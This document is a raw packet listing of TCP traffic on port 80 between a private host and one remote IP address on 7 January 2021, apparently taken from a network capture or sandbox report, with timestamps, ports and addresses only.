Jan 7, 2021 16:33:39.652251005 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652271986 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652288914 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652331114 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652363062 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652370930 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652422905 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652446032 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652468920 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652508974 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652545929 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652549982 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652590990 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652612925 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652627945 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652667046 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652687073 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652708054 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652756929 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652772903 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652801991 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652848959 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652865887 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652896881 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652936935 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652967930 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652975082 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.653016090 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.653039932 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.655735016 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.804863930 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.804943085 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.804974079 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805006027 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805036068 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805084944 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805130005 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805171013 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805191040 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805212021 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805227041 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805234909 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805253983 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805284023 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805293083 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805335999 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805362940 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805376053 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805445910 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805454969 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805499077 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805537939 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805560112 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805576086 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805614948 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805639982 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805655003 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805702925 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805712938 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805747032 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805785894 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805804014 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805825949 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805864096 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805898905 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.805901051 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805953979 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.805958986 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807262897 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807374954 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807430983 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807470083 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807498932 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807518005 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807562113 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807600975 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807605982 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807640076 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807665110 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807682991 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807724953 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807754993 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807771921 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807811975 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807841063 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807861090 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807907104 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807946920 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.807955027 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.807987928 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808012009 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.808031082 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808068037 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808096886 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.808105946 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808145046 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808165073 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.808192015 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808235884 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808250904 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.808274984 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808315992 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.808334112 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.810045004 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.957695007 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957755089 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957798004 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957839966 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957889080 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957931042 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957957983 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.957973003 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.957992077 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.958014965 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958045959 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.958055019 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958096027 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958125114 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.958134890 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958177090 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.958180904 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958230972 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958247900 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.958276033 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958316088 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.958343983 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.959794044 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.959855080 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.959902048 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.959908962 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.959954977 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.959980011 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.959996939 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960038900 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960063934 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960081100 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960120916 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960149050 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960160971 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960202932 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960225105 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960252047 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960295916 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960315943 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960335016 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960376978 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960402012 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960414886 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960458994 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.960484982 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.960692883 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.961610079 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961671114 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961714029 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961744070 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.961762905 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961812973 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961829901 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.961854935 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961896896 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961922884 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.961939096 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.961978912 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962009907 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.962018967 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962059975 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962080002 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.962110043 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962153912 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962172985 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.962192059 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962233067 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962255001 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.962272882 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962312937 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962340117 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.962353945 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.962428093 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.963650942 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.109869003 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.109927893 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.109967947 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110007048 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110044956 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110066891 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.110095024 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110117912 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.110137939 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110177040 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110193968 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.110214949 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110253096 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110266924 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.110290051 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110330105 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110342979 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.110368013 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.110416889 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.111876965 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.111922979 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.111980915 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112026930 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112066031 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112113953 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112118959 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112157106 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112215042 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112235069 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112438917 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112478018 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112495899 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112525940 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112566948 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112585068 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112607956 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112639904 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112672091 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112678051 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112719059 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112740993 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112761021 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112802982 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112818003 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.112852097 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112896919 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.112910986 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.113692045 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113735914 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113770008 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.113773108 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113816023 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113831043 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.113856077 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113904953 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113908052 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.113949060 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113985062 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.113997936 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115113020 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115153074 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115178108 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115191936 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115231991 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115247011 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115271091 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115310907 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115326881 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115351915 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115400076 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115401983 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115442991 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115480900 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.115482092 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115511894 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.115531921 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262183905 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262271881 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262305975 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262340069 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262381077 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262423038 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262466908 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262518883 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262562990 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262593985 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262604952 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262626886 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262640953 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262649059 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262691975 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262729883 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262731075 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262774944 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262809038 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262820005 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262870073 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262901068 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.262914896 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262955904 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.262991905 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263000965 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263041019 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263079882 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263082027 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263125896 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263154030 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263168097 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263217926 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263243914 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263263941 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263303995 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263334036 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263348103 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263390064 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263415098 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263428926 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263469934 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263495922 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263509035 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263559103 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263577938 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263603926 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263643026 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263669968 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263680935 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263721943 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263747931 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263760090 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263804913 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263824940 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263845921 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263895988 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263914108 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.263940096 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.263979912 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264005899 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264020920 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264062881 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264086008 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264102936 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264142990 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264170885 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264182091 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264230967 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264247894 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264276028 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264314890 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264343977 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264354944 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264394999 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264420986 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264432907 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264473915 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264499903 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264513016 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264561892 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264581919 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264606953 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264646053 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264676094 CET	49165	80	192.168.2.22	35.208.84.24
